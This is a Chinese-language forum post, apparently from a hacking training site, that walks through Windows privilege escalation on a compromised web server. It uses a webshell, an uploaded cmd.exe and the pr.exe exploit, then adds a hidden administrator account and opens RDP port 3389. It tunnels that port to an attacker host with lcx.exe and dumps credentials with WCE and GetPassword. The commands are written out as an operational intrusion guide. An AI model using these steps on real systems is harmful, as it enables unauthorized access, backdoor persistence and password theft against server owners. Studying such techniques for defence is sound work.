(一)Windows权限提升概述

[复制链接]
发表于 2025-11-19 21:58:34 | 显示全部楼层 |阅读模式
提权攻击:

通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期从其他账户访问敏感信息,或甚至获得对某个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问权限时,我们将其行为称之为权限提升攻击。

提权方式:

1 . 操作系统漏洞提权
2 . 第三方服务提权

提权方式:操作系统漏洞提权

根据没有修补的补丁号码,到网上找利用程序,进行利用 。

1 . 访问目标网站
2 . 拿到webshell:通过文件上传,SQL注入,代码执行等等
3 . 上传自己的cmd.exe(因为默认一般不让调用系统的cmd.exe)
4 . 查看服务器信息(网络信息 , 账号信息 , systeminfo系统详细信息 等等)
5 . 利用提权补丁对比工具,查看可以利用的poc(漏洞测试代码程序)
6 . 上传可用的提权程序进行提权

示例:
进行提权添加账号 , 开启3389端口 ,进行端口转发,最后进行远程登录

1 . 访问目标网站。

截图202511191354222846.png

2 . 获取webshell   

截图202511191354537798.png

3 . 执行cmd命令,  但是默认情况下拒绝访问 , 所有需要上传自己的cmd.exe

截图202511191355132127.png

4 . 第三步上传完成后 , 查看服务器信息
     a. 查看网络信息:ipconfig

截图202511191400223229.png


b . 查看系统信息:systeminfo
截图202511191400474562.png

5 . 利用提权补丁对比工具,查看可以利用的poc(漏洞利用代码程序)
复制上一步systeminfo得到的信息到对比工具上
截图202511191401101374.png

6 . 上传其中一种提权poc , 上传pr.exe
截图202511191402096951.png

7 . 查看并测试默认权限是什么, 可以干什么
截图202511191402346255.png

8 . 利用pr.exe 开始提权, 注意后面执行的命令使用双引号包裹
截图202511191402526896.png

9 . 利用pr.exe 提权成功 , 添加用户 net  user  tys  123456  /add

截图202511191403181540.png


也可以添加隐藏用户:net  user  tys1$  123456  /add    ,查看隐藏用户可以输入net user tys1$

截图202511191404203670.png


10 . 利用pr.exe 提权成功 ,把用户添加到管理员组  net localgroup  administrators  tys  /add

截图202511191404548379.png


11 . 查看当前系统开启端口情况  netstat -anp tcp

截图202511191405137804.png


12 . 上传一个开3389端口的exp ,进行开启

截图202511191405388686.png

截图202511191406004955.png


13. 此时虽然端口已经打开,账号也已经 创建完成 , 但是不能直接远程登录,因为我们的物理机跟web服务器是不能直接通信的,所以要进行端口数据转发

截图202511191406348749.png


端口转发,  网络拓扑解析 , 现在要实现 从2003 server 端口3389传输的数据,使得能在hack web server 上能进行监听

截图202511191407067916.png



a .在2003 server 中上传端口转发程序: lcx.exe

截图202511191407243594.png


b. 在肉鸡上,也就是server 2003 上运行命令:

lcx.exe  -slave  192.168.3.7(hack web ip) 1111(hack web prot)   10.10.10.100(肉鸡IP) 3389(肉鸡端口)

代码解读 : 当有人连接1111端口时,把数据转移到3389端口 . 肉鸡和hack web 之间利用1111端口打通了, hack web 的3389 和 肉鸡的3389 端口

截图202511191407584338.png


c . 这里先利用本地设备, 也就是物理机当做 hack web 设备 进行端口数据转发,

双击cmd.bat运行lcx程序 ,在dos界面输入:  lcx  -listen  1111本机端口)   3389(肉鸡端口)
代码解读 : 监听1111 , 3389

截图202511191408418044.png

d . 在另外一台设备上开启远程桌面连接 , 输入监听主机的IP地址进行连接, 输入server 2003 的账号密码进行登录肉鸡web server  ,  登录成功

截图202511191409108602.png



e. 读取原有用户密码:  用wce_32.exe

截图202511191409406587.png

f. 读取原有用户密码:  用GetPassword_x32.exe
截图202511191410227535.png

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.079930 second(s), 26 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表